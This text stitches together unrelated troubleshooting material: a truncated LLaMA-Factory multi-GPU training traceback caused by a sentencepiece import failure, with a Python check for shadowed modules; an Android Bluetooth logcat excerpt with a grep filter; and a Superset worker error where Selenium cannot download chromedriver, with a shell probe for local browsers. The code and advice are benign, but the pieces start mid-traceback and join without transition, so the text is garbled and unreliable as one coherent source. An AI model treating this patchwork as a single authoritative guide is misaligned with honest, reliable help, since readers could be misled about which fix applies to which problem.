LlamaTokenizer [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module> [rank0]: import sentencepiece as spm [rank0]: File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module> [rank0]: from . 
import _sentencepiece [rank0]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank0]: The above exception was the direct cause of the following exception: [rank0]: Traceback (most recent call last): [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer [rank0]: tokenizer = AutoTokenizer.from_pretrained( [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained [rank0]: tokenizer_class_from_name(config_tokenizer_class) is not None [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name [rank0]: return getattr(module, class_name) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__ [rank0]: module = self._get_module(self._class_to_module[name]) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module [rank0]: raise RuntimeError( [rank0]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback): [rank0]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank0]: The above exception was the direct cause of the following exception: [rank0]: Traceback (most recent call last): [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module> 
[rank0]: launch() [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch [rank0]: run_exp() [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp [rank0]: _training_function(config={"args": args, "callbacks": callbacks}) [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function [rank0]: run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks) [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft [rank0]: tokenizer_module = load_tokenizer(model_args) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer [rank0]: raise OSError("Failed to load tokenizer.") from e [rank0]: OSError: Failed to load tokenizer. [rank3]: Traceback (most recent call last): [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank3]: return importlib.import_module("." 
+ module_name, self.__name__)
[rank3]:            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module
[rank3]:     return _bootstrap._gcd_import(name[level:], package, level)
[rank3]:            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "<frozen importlib._bootstrap>", line 1206, in _gcd_import
[rank3]:   File "<frozen importlib._bootstrap>", line 1178, in _find_and_load
[rank3]:   File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked
[rank3]:   File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
[rank3]:   File "<frozen importlib._bootstrap_external>", line 940, in exec_module
[rank3]:   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module>
[rank3]:     from .tokenization_llama import LlamaTokenizer
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module>
[rank3]:     import sentencepiece as spm
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module>
[rank3]:     from . import _sentencepiece
[rank3]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py)
[rank3]:
[rank3]: The above exception was the direct cause of the following exception:
[rank3]:
[rank3]: Traceback (most recent call last):
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer
[rank3]:     tokenizer = AutoTokenizer.from_pretrained(
[rank3]:                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained
[rank3]:     tokenizer_class_from_name(config_tokenizer_class) is not None
[rank3]:     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name
[rank3]:     return getattr(module, class_name)
[rank3]:            ^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__
[rank3]:     module = self._get_module(self._class_to_module[name])
[rank3]:              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module
[rank3]:     raise RuntimeError(
[rank3]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback):
[rank3]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py)
[rank3]:
[rank3]: The above exception was the direct cause of the following exception:
[rank3]:
[rank3]: Traceback (most recent call last):
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module>
[rank3]:     launch()
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch
[rank3]:     run_exp()
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp
[rank3]:     _training_function(config={"args": args, "callbacks": callbacks})
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function
[rank3]:     run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks)
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft
[rank3]:     tokenizer_module = load_tokenizer(model_args)
[rank3]:                        ^^^^^^^^^^^^^^^^^^^^^^^^^^
[rank3]:   File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer
[rank3]:     raise OSError("Failed to load tokenizer.") from e
[rank3]: OSError: Failed to load tokenizer.

(Ranks 1 and 2 abort with the identical traceback, each ending in the same "OSError: Failed to load tokenizer.")

[rank0]:[W703 16:13:30.861219244 ProcessGroupNCCL.cpp:1479] Warning: WARNING: destroy_process_group() was not called before program exit, which can leak resources.
For more info, please see https://pytorch.org/docs/stable/distributed.html#shutdown (function operator())
W0703 16:13:31.449512 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913282 closing signal SIGTERM
W0703 16:13:31.450263 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913283 closing signal SIGTERM
W0703 16:13:31.450724 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913284 closing signal SIGTERM
E0703 16:13:31.765744 3913223 torch/distributed/elastic/multiprocessing/api.py:874] failed (exitcode: 1) local_rank: 0 (pid: 3913281) of binary: /usr/bin/python3.11
Traceback (most recent call last):
  File "/usr/local/bin/torchrun", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/torch/distributed/elastic/multiprocessing/errors/__init__.py", line 355, in wrapper
    return f(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/torch/distributed/run.py", line 892, in main
    run(args)
  File "/usr/local/lib/python3.11/dist-packages/torch/distributed/run.py", line 883, in run
    elastic_launch(
  File "/usr/local/lib/python3.11/dist-packages/torch/distributed/launcher/api.py", line 139, in __call__
    return launch_agent(self._config, self._entrypoint, list(args))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/torch/distributed/launcher/api.py", line 270, in launch_agent
    raise ChildFailedError(
torch.distributed.elastic.multiprocessing.errors.ChildFailedError:
============================================================
/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py FAILED
------------------------------------------------------------
Failures:
  <NO_OTHER_FAILURES>
------------------------------------------------------------
Root Cause (first observed failure):
[0]:
  time      : 2025-07-03_16:13:31
  host      : wiseatc-Super-Server
  rank      : 0 (local_rank: 0)
  exitcode  : 1 (pid: 3913281)
  error_file: <N/A>
  traceback : To enable traceback see: https://pytorch.org/docs/stable/elastic/errors.html
============================================================
Traceback (most recent call last):
  File "/home/wiseatc/.local/bin/llamafactory-cli", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/wiseatc/LLaMA-Factory/src/llamafactory/cli.py", line 130, in main
    process = subprocess.run(
              ^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/subprocess.py", line 569, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '['torchrun', '--nnodes', '1', '--node_rank', '0', '--nproc_per_node', '4', '--master_addr', '127.0.0.1', '--master_port', '38589', '/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py', 'saves/DeepSeek-R1-1.5B-Distill/lora/train_2025-07-03-16-00-01/training_args.yaml']' returned non-zero exit status 1.
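Every rank bottoms out in the same ImportError: the compiled extension `_sentencepiece` cannot be loaded from a "partially initialized" `sentencepiece` package. That message usually points at a broken install or at a local file/directory named `sentencepiece` shadowing the installed one. A small stdlib sketch (not part of LLaMA-Factory; the demo modules are stand-ins) for checking where a module actually resolves from:

```python
import importlib.util
import os

def module_origin(name):
    """Return the file Python would import `name` from, or None if unresolvable."""
    try:
        spec = importlib.util.find_spec(name)
    except (ImportError, ValueError):
        return None
    return spec.origin if spec else None

def shadowed_by_cwd(name):
    """True when `name` resolves to a path under the current working directory,
    which usually means a local folder is shadowing the installed package."""
    origin = module_origin(name)
    if not origin or origin in ("built-in", "frozen"):
        return False
    return os.path.abspath(origin).startswith(os.getcwd() + os.sep)

if __name__ == "__main__":
    # On the failing host you would probe "sentencepiece"; "json" merely
    # demonstrates the check with a module every interpreter has.
    for mod in ("json", "os"):
        print(mod, "->", module_origin(mod), "shadowed:", shadowed_by_cwd(mod))
```

If `sentencepiece` resolves somewhere unexpected, launching the job from a different directory or reinstalling the package (`pip install --force-reinstall sentencepiece`) is the usual remedy.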

03-03 14:15:59.427 2805 4193 D BluetoothSystemServer: BluetoothManagerService: 03-03 14:15:59.427 Package [com.oplus.olc] requested to [Disable]. Reason is APPLICATION_REQUEST
03-03 14:15:59.428 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725]
03-03 14:15:59.435 2805 4193 D BluetoothSystemServer: BluetoothManagerService: 03-03 14:15:59.435 Package [com.oplus.olc] requested to [Disable]. Reason is APPLICATION_REQUEST
03-03 14:15:59.436 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725]
03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: disabling:false
03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: handleDisable
03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: handleDisable: Sending off request.
03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: Re-Queue MESSAGE_HANDLE_DISABLE_DELAYED(1)
03-03 14:15:59.764 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725]
03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_BLUETOOTH_STATE_CHANGE: prevState=ON newState=TURNING_OFF
03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: No support for AutoOn feature: Not creating a timer
03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: broadcastIntentStateChange: action=BLE_STATE_CHANGED prevState=ON newState=TURNING_OFF
03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: broadcastIntentStateChange: action=STATE_CHANGED prevState=ON newState=TURNING_OFF
03-03 14:16:00.065 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: disabling:true
03-03 14:16:00.065 2805 3006 D BluetoothSystemServer: BluetoothManagerService: Handle disable is finished
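Dumps like this are easier to follow if you keep only the adapter state machine lines. A grep sketch (the `bt.log` file and the sample lines written into it are stand-ins for a real logcat capture):

```shell
# Build a small sample capture, then keep only the state transitions and the
# app requests that triggered them; the rest of the BluetoothManagerService
# chatter is dropped.
cat > bt.log <<'EOF'
03-03 14:15:59.427 2805 4193 D BluetoothSystemServer: BluetoothManagerService: Package [com.oplus.olc] requested to [Disable]. Reason is APPLICATION_REQUEST
03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: handleDisable: Sending off request.
03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_BLUETOOTH_STATE_CHANGE: prevState=ON newState=TURNING_OFF
EOF
grep -E 'MESSAGE_BLUETOOTH_STATE_CHANGE|requested to \[(Enable|Disable)\]' bt.log
```

On a device the same pattern can be fed straight from `adb logcat` through a pipe instead of a file.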

When starting Superset with Docker and enabling thumbnails, the worker console reports "Failed at generating thumbnail" with:

Message: Unable to obtain driver for chrome; For documentation on this error, please visit: https://www.selenium.dev/documentation/webdriver/troubleshooting/errors/driver_location
superset_worker | Traceback (most recent call last):
superset_worker |   File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/driver_finder.py", line 67, in _binary_paths
superset_worker |     output = SeleniumManager().binary_paths(self._to_args())
superset_worker |              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
superset_worker |   File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/selenium_manager.py", line 55, in binary_paths
superset_worker |     return self._run(args)
superset_worker |            ^^^^^^^^^^^^^^^
superset_worker |   File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/selenium_manager.py", line 129, in _run
superset_worker |     raise WebDriverException(
superset_worker | selenium.common.exceptions.WebDriverException: Message: Unsuccessful command executed: /app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/linux/selenium-manager --browser chrome --language-binding python --output json; code: 65
superset_worker | {'code': 65, 'message': 'error sending request for url (https://googlechromelabs.github.io/chrome-for-testing/last-known-good-versions-with-downloads.json)', 'driver_path': '', 'browser_path': ''}
superset_worker |
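Exit code 65 together with "error sending request for url (…chrome-for-testing…)" means Selenium Manager found no local driver and then failed to download one, typically because the worker container has no outbound network access to the Google endpoint. A robust fix is to bake a matching browser and driver into the worker image so nothing ever needs the network. A probe sketch for what the image already ships (the binary names listed are the common ones; adjust for your image):

```shell
#!/bin/sh
# Report which browser/driver binaries Selenium could fall back to locally
# instead of downloading one at runtime.
for bin in chromedriver google-chrome chromium chromium-browser firefox geckodriver; do
  if path=$(command -v "$bin" 2>/dev/null); then
    echo "found:   $bin -> $path"
  else
    echo "missing: $bin"
  fi
done
```

Once a matching browser/driver pair is on PATH, Selenium 4 uses it without contacting the network; Superset's thumbnail settings (e.g. `WEBDRIVER_TYPE` in `superset_config.py` — check the Superset docs for the exact keys in your version) should then match the installed browser.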
